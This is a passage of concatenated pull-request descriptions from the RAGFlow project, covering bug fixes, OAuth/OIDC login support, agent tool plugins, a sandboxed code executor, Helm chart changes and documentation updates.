- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
## Cause of the bug:
During the execution process, due to improper use of trio
CapacityLimiter, the configuration parameter MAX_CONCURRENT_TASKS is
invalid, causing the executor to take out a large number of tasks from
the Redis queue at one time.
This behavior will cause the task executor to occupy too much memory and
be killed by the OS when a large number of tasks exist at the same time.
As a result, all executing tasks are suspended.
## Fix:
Added the task_manager method to the entry of /rag/svr/task_executor.py
to make CapacityLimiter effective. Deleted the invalid async with
statement.
## Fix result:
After testing, the task executor execution meets expectations, that is:
concurrent execution of up to $MAX_CONCURRENT_TASKS tasks.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Hello, when I input a very long line in the chat input box, it will fail
with following error:
```
2025-05-17 16:11:26,004 ERROR 182558 value too long for type character varying(255)
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
psycopg2.errors.StringDataRightTruncation: value too long for type character varying(255)
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/var/home/sfc/Projects/ragflow/api/apps/conversation_app.py", line 68, in set_conversation
ConversationService.save(**conv)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3128, in inner
return fn(*args, **kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 145, in save
return cls.save_n(**kwargs)
File "/var/home/sfc/Projects/ragflow/api/db/services/common_service.py", line 139, in save_n
sample_obj = cls.model(**kwargs).save(force_insert=True)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 6923, in save
pk = self.insert(**field_dict).execute()
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2011, in inner
return method(self, database, *args, **kwargs)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2082, in execute
return self._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2887, in _execute
return super(Insert, self)._execute(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2598, in _execute
cursor = self.execute_returning(database)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 2605, in execute_returning
cursor = database.execute(self)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3299, in execute
return self.execute_sql(sql, params)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3289, in execute_sql
with __exception_wrapper__:
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3059, in __exit__
reraise(new_type, new_type(exc_value, *exc_args), traceback)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 192, in reraise
raise value.with_traceback(tb)
File "/var/home/sfc/Projects/ragflow/.venv/lib/python3.10/site-packages/peewee.py", line 3291, in execute_sql
cursor.execute(sql, params or ())
peewee.DataError: value too long for type character varying(255)
```
This PR fix it by truncate the `name` field in the `set_conversation`
method in the `conversation_app.py`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Rendering recall test page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where message references could not be displayed
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Hello, our use case requires LLM agent to invoke some tools, so I made a
simple implementation here.
This PR does two things:
1. A simple plugin mechanism based on `pluginlib`:
This mechanism lives in the `plugin` directory. It will only load
plugins from `plugin/embedded_plugins` for now.
A sample plugin `bad_calculator.py` is placed in
`plugin/embedded_plugins/llm_tools`, it accepts two numbers `a` and `b`,
then give a wrong result `a + b + 100`.
In the future, it can load plugins from external location with little
code change.
Plugins are divided into different types. The only plugin type supported
in this PR is `llm_tools`, which must implement the `LLMToolPlugin`
class in the `plugin/llm_tool_plugin.py`.
More plugin types can be added in the future.
2. A tool selector in the `Generate` component:
Added a tool selector to select one or more tools for LLM:

And with the `bad_calculator` tool, it results this with the `qwen-max`
model:

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Improve oauth configuration documentation and examples.
- Related pull requests:
- #7379
- #7553
- #7587
- Related issues:
- #3495
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Fixed the issue where the height of the chat page shared externally
did not fill the window #7460
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Launch sandbox from docker-compose.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Close#7655
Based on the codes atthe api_app, I think the reference is one-to-one
with the message
`
def fillin_conv(ans):
nonlocal conv, message_id
if not conv.reference:
conv.reference.append(ans["reference"])
else:
conv.reference[-1] = ans["reference"]
conv.message[-1] = {"role": "assistant", "content": ans["answer"], "id":
message_id}
ans["id"] = message_id
`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add code agent component.
#4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the delete dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Feat: Fixed the issue where the dataset configuration page kept
refreshing #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Use DOMPurify to filter out dangerous HTML #7668
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add the JS code (or other) executor component to Agent. #4977
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Deprecate `/github_callback` route in favor of
`/oauth/callback/<channel>` for GitHub OAuth integration:
- Added GitHub OAuth support in the authentication module
- Introduced `GithubOAuthClient` with methods to fetch and normalize
user info
- Updated `CLIENT_TYPES` to include GitHub OAuth client
- Deprecated `/github_callback` route and suggested using the generic
`/oauth/callback/<channel>` route
---
- Related pull requests:
- #7379
- #7553
### Usage
- [Create a GitHub OAuth
App](https://github.com/settings/applications/new) to obtain the
`client_id` and `client_secret`, configure the authorization callback
url: `https://your-app.com/v1/user/oauth/callback/github`
- Edit `service_conf.yaml.template`:
```yaml
# ...
oauth:
github:
type: "github"
icon: "github"
display_name: "Github"
client_id: "your_client_id"
client_secret: "your_client_secret"
redirect_uri: "https://your-app.com/v1/user/oauth/callback/github"
# ...
```
### Type of change
- [x] Documentation Update
- [x] Refactoring (non-breaking change)
TOML-table-based project.license is deprecated as per PEP 639, see:
https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license-and-license-files
### What problem does this PR solve?
The following error when building project (e.g. `uv build`)
```
SetuptoolsDeprecationWarning: `project.license` as a TOML table is deprecated
!!
********************************************************************************
Please use a simple string containing a SPDX expression for `project.license`. You can also use `project.license-files`. (Both options available on setuptools>=77.0.0).
By 2026-Feb-18, you need to update your project and remove deprecated calls
or your builds will no longer be supported.
See https://packaging.python.org/en/latest/guides/writing-pyproject-toml/#license for details.
********************************************************************************
!!
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
For `uv package`/`uv pip install ".[full]"`, bug introduced in #6370:
* Removes erroneous (non-package) directories (`helm`, `flask_session`)
* Adds `mcp.server` package
* Resolves "warning: package would be ignored" ambiguity by changing
`sdk` to `sdk.python.ragflow_sdk`
* Resolves "error: package directory 'intergrations' does not exist" by
including `intergrations.chatgpt-on-wechat.plugins` explicitly
* Also rearranges packages in alphabetical order, for DX.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When Delete Chunk Will Also Delete Chunk Related Image
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Other (please describe): llm factories update
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Add data set configuration form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display inline (non-quoted) images in the chat and search modules
#7623
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update 7 readme
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Add libjemalloc installation command. If the operating system does not
have the libjemalloc library, the execution of entrypoint.sh and
launch_backend_service.sh will be interrupted, and the
rag/svr/task_executor.py script will not be started normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add frontend support for third-party login integration:
- Used `getLoginChannels` API to fetch available login channels from the
server
- Used `loginWithChannel` function to initiate login based on the
selected channel
- Refactored `useLoginWithGithub` hook to `useOAuthCallback` for
generalized OAuth callback handling
- Updated the login page to dynamically render third-party login buttons
based on the fetched channel list
- Styled third-party login buttons to improve user experience
- Removed unused code snippets
> This PR removes the previously hardcoded GitHub login button. Since
the functionality only worked when `location.host` was equal to
`demo.ragflow.io`, and the authentication logic is now based on
`login.ragflow.io`, this change does not affect the existing logic and
is considered a non-breaking change
---
#### Frontend Screenshot && Backend Configuration

```yaml
# docker/service_conf.yaml.template
# ...
oauth:
github:
icon: github
display_name: "Github"
# ...
custom_channel:
display_name: "OIDC"
# ...
custom_channel_2:
display_name: "OAuth2"
# ...
```
---
- Related pull requests:
- #7379
- #7521
- Related issues:
- #3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Show images in reply messages #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Fixed the issue where the chat page would jump after entering the
homepage #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the display position of recall test item images #7608
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Info of whether applying graph resolution and community extraction is
storage in `task["kb_parser_config"]`. However, previous code get
`graphrag_conf` from `task["parser_config"]`, making `with_resolution`
and `with_community` are always false.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add FormContainer component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix HTTP API Create/Update dataset parser config default value error
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Adds support for the GPT-4.1 series from OpenAI.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Hello, we are using ragflow as a backend service, so we need to manage
agents from our own frontend. So adding these http APIs to manage
agents.
The code logic is copied and modified from the `rm` and `save` methods
in `api/apps/canvas_app.py`.
btw, I found that the `save` method in `canvas_app.py` actually allows
to modify an agent to an existing title, so I kept the behavior in the
http api. I'm not sure if this is intentional.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Since `import markdown.markdown` has been changed to `import markdown`
in `rag/app/naive.py`, previous code for converting markdown tables
would call a markdown module instead of a callable function. This cause
error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Modified the chart to retain persistent volumes by default when the
chart is uninstalled, following established best practices in the Helm
community (e.g., Bitnami charts)
### What problem does this PR solve?
Previously, deleting the helm chart would automatically remove all
persistent data, which poses a risk of accidental data loss.
### Rationale
This change aligns with industry standards to safeguard data by
requiring explicit action to remove persistence, rather than making
deletion the default behavior.
### Impact:
Users who intentionally want to remove persistent data will need to do
so manually or by setting appropriate flags during chart uninstallation.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
As RAGFlow has an integration with Langfuse, this docs page shows how to
configure Langfuse tracing.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the update dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation Updates
5. fix bug: #5915
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fixes bug & regression introduced by [PR #7187 - refactor: Update Redis
configuration to use StatefulSet instead of deployment with
pvc](https://github.com/infiniflow/ragflow/pull/7187):
1. Fixes bug #7403 - `redis.persistence.enabled` missing from
`helm/values.yaml` causes helm error:
[ERROR] templates/: template: ragflow/templates/redis.yaml:55:24:
executing "ragflow/templates/redis.yaml" at
<.Values.redis.persistence.enabled>: nil pointer evaluating interface
{}.enabled
2. Fixes regression: reverts hardcoded redis.storage.capacity value back
to using variable `redis.storage.capacity` from `helm/values.yaml`.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
1. The MySQL instance is configured with max_connections=1000,
but our connection pool was limited to max_connections: 100.
This mismatch caused connection pool exhaustion during performance
testing.
2. Increase stale_timeout to resolve#6548
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Cross-language query #7376#4503#5710#7470
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Kb detail supports return document total size now.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add scheduled workflow for daily HTTP API full tests
Configure cron job to trigger at 16:00:00Z(00:00:00+08:00)
### Type of change
- [X] CI update
### What problem does this PR solve?
Feat: Replace the submit form button with ButtonLoading #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Two Case when local Es tag search has result which is filtered by score
1: Doc has empty tag,and not visi LLM
2: Code may use empty examples in Prompt for LLM search tag
Co-authored-by: huangfuqunze <huangfuqunze.hfqz@alibaba-inc.com>
### What problem does this PR solve?
The parameter positions were incorrect and have been corrected to use
keyword argument passing
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the operation cell of the table on the file management page
and dataset page #3221.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix deepseek-ai/deepseek-vl2 model can not be select as a VL model to
parse pdf image . And add other vl models config from siliconflow
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: unknown <taoshi.ln@chinatelecom.cn>
### What problem does this PR solve?
Add `/login/channels` route and improve auth logic to support frontend
integration with third-party login providers:
- Add `/login/channels` route to provide authentication channel list
with `display_name` and `icon`
- Optimize user info parsing logic by prioritizing `avatar_url` and
falling back to `picture`
- Simplify OIDC token validation by removing unnecessary `kid` checks
- Ensure `client_id` is safely cast to string during `audience`
validation
- Fix typo
---
- Related pull request: #7379
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Fix:When sharing the knowledge base of multiple tenants with one person,
when this person queries the knowledge base of both tenants, they will
only query the question of the first person's knowledge base
Co-authored-by: 杜有强 <duyq@internal.ths.com.cn>
### What problem does this PR solve?
1. Add delete_by_ids method
2. Add get_doc_ids_by_doc_names
3. Improve user_canvan_version's logic (avoid O(n) db IO)
4. Improve document delete logic (avoid O(n) db IO)
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: 马继龙 <majilong@ideal.com>
### What problem does this PR solve?
Fix: After deleting the file from the file management menu, it was not
removed from the MinIO bucket.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
This is a follow-up of #7088 , adding a knowledge base type input to the
`Begin` component, and a knowledge base selector to the agent flow debug
input panel:

then you can select one or more knowledge bases when testing the agent:

Note: the lines changed in `agent/component/retrieval.py` after line 94
are modified by `ruff format` from the `pre-commit` hooks, no functional
change.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7466
I think due to some times we can not get position
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When parsing documents containing images, the current code uses a
single-threaded approach to call the VL model, resulting in extremely
slow parsing speed (e.g., parsing a Word document with dozens of images
takes over 20 minutes).
By switching to a multithreaded approach to call the VL model, the
parsing speed can be improved to an acceptable level.
### Type of change
- [x] Performance Improvement
---------
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
fixed errror when vars of cnt begin declare with key contain "begin"
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix https://github.com/infiniflow/ragflow/issues/7224 and
https://github.com/infiniflow/ragflow/issues/6793
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)a
- [x] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Fix instructions for Ollama
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
1. Use `host.docker.internal` as base URL
2. Fix numbers in list
3. Make clear what is the console input and what is the output
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix `filed_map` was incorrectly persisted. #7412
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the dataset page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
change create dataset delimiter default value to r'\n'
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the dataset list page style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix#6600
Hello, I have the same business requirement as #6600. My use case is:
We have many departments (> 20 now and increasing), and each department
has its own knowledge base. Because the agent workflow is the same, so I
want to change the knowledge base on the fly, instead of creating agents
for every department.
It now looks like this:

Knowledge bases can be selected from the dropdown, and passed through
the variables in the table. All selected knowledge bases are used for
retrieval.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7407
Based on this context, I think there should be some reasons that let
some LLMs have a mismatch (add the wrong "@xxx"),
So I think when use fid can not fetch llm then tried to just use name
should can fetch it.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Remove unnecessary parameter restrictions in dataset creation API
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Deprecate get_dataset_id_and_document_id fixture, use add_document
instead
### Type of change
- [x] Update test cases
### What problem does this PR solve?
Feat: Using IconFont as an additional icon library #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When you removed any document in a knowledge base using knowledge graph,
the graph's `removed_kwd` is set to "Y".
However, in the function `graphrag.utils.get_gaph`, `rebuild_graph`
method is passed and directly return `None` while `removed_kwd=Y`,
making residual part of the graph abandoned (but old entity data still
exist in db).
Besides, infinity instance actually pass deleting graph components'
`source_id` when removing document. It may cause wrong graph after
rebuild.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify background color of Card #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Qwen3 and more LLMs.
Close#7296
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add a language switch drop-down box to the top navigation bar
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Modify the segmented component style #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR introduces Pydantic-based validation for the create dataset HTTP
API, improving code clarity and robustness. Key changes include:
1. Pydantic Validation
2. Error Handling
3. Test Updates
4. Documentation
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix the redis lock will always timeout (change the logic order release
lock first)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the home page #3321
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Bind data to the agent module of the home page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add support for OAuth2 and OpenID Connect (OIDC) authentication,
allowing OAuth/OIDC authentication using the specified routes:
- `/login/<channel>`: Initiates the OAuth flow for the specified channel
- `/oauth/callback/<channel>`: Handles the OAuth callback after
successful authentication
The callback URL should be configured in your OAuth provider as:
```
https://your-app.com/oauth/callback/<channel>
```
For detailed instructions on configuring **service_conf.yaml.template**,
see: `./api/apps/auth/README.md#usage`.
- Related issues
#3495
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
When updating a chat assistant using API,if the dataset attached by the
current chat assistant is not empty,setting dataset to
null("dataset_ids":[]) will cause update failure:'dataset_ids' can't be
empty
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add AsyncTreeSelect component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
当前graphrag的LOOP_PROMPT,会导致模型输出Y之后,继续补充了实体和关系,比较浪费时间。参照[graph
rag](https://github.com/microsoft/graphrag/blob/main/graphrag/prompts/index/extract_graph.py)最新的代码,修改了LOOP_PROMPT,经过验证,修改后可以稳定的输出Y停止。
Currently, GraphRAG’s LOOP_PROMPT causes the model to keep appending
entities and relationships even after outputting “Y,” which wastes time.
Referring to the latest code in
[graphRAG](https://github.com/microsoft/graphrag/blob/main/graphrag/prompts/index/extract_graph.py),
I modified the LOOP_PROMPT, and after verification the updated prompt
reliably outputs “Y” and stops.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: liuzhenghua-jk <liuzhenghua-jk@360shuke.com>
### What problem does this PR solve?
0.18.0 mcp server can not start with upgrade from 0.17.2 or new install
except rebuild all docker
Close#7321
mcp server can not start auto from docker :
2025-04-25 17:30:44,512 INFO 25 task_executor_2a9f3e2de99a_0 reported
heartbeat: {"name": "task_executor_2a9f3e2de99a_0", "now":
"2025-04-25T17:30:44.509+08:00", "boot_at":
"2025-04-25T16:43:33.038+08:00", "pending": 0, "lag": 0, "done": 0,
"failed": 0, "current": {}}
usage: server.py [-h] [--base_url BASE_URL] [--host HOST] [--port PORT]
[--mode MODE] [--api_key API_KEY]
server.py: error: unrecognized arguments:
problem:
server.py in docker start arguments not correct , so mcp server start
fail
reason:
```
1. docker-copose.yaml
example - --mcp-host-api-key="ragflow-12345678" is wrong. do not add "" to key or it says:"api-key wrong"
2.docker file entrypoint.sh can not translate config to exec command , we need mapping file from host to docker
- ./entrypoint.sh:/ragflow/entrypoint.sh
3.just add one code raw fix all probelm
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
- [x] Performance Improvement
---------
Co-authored-by: Yongteng Lei <yongtengrey@outlook.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
In the generate_confirmation_token method, a spelling error was found
with 'tenent_id'. The correct spelling should be 'tenant_id'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: shengliang xiao <shengliangxiao2024@gmail.com>
With current config will get error "Fail to access model(gemma-7b-it)
using this api key"
Since the model has been removed, according to Groq official document:
https://console.groq.com/docs/models
### Type of change
- [ x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Batch operations on documents in a dataset #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enhance capability of `list_docs`.
Breaking change: change method from `GET` to `POST`.
### Type of change
- [x] Refactoring
- [x] Enhancement with breaking change
### What problem does this PR solve?
Feat: Create empty document. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Filter document by running status and file type. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Save document metadata #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6984
1. Markdown parser supports get pictures
2. For Native, when handling Markdown, it will handle images
3. improve merge and
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Save the configuration information of the knowledge base document
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the document configuration dialog with shadcn #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This PR adds the support for latest OpenSearch2.19.1 as the store engine
& search engine option for RAGFlow.
### Main Benefit
1. OpenSearch2.19.1 is licensed under the [Apache v2.0 License] which is
much better than Elasticsearch
2. For search, OpenSearch2.19.1 supports full-text
search、vector_search、hybrid_search those are similar with Elasticsearch
on schema
3. For store, OpenSearch2.19.1 stores text、vector those are quite
simliar with Elasticsearch on schema
### Changes
- Support opensearch_python_connetor. I make a lot of adaptions since
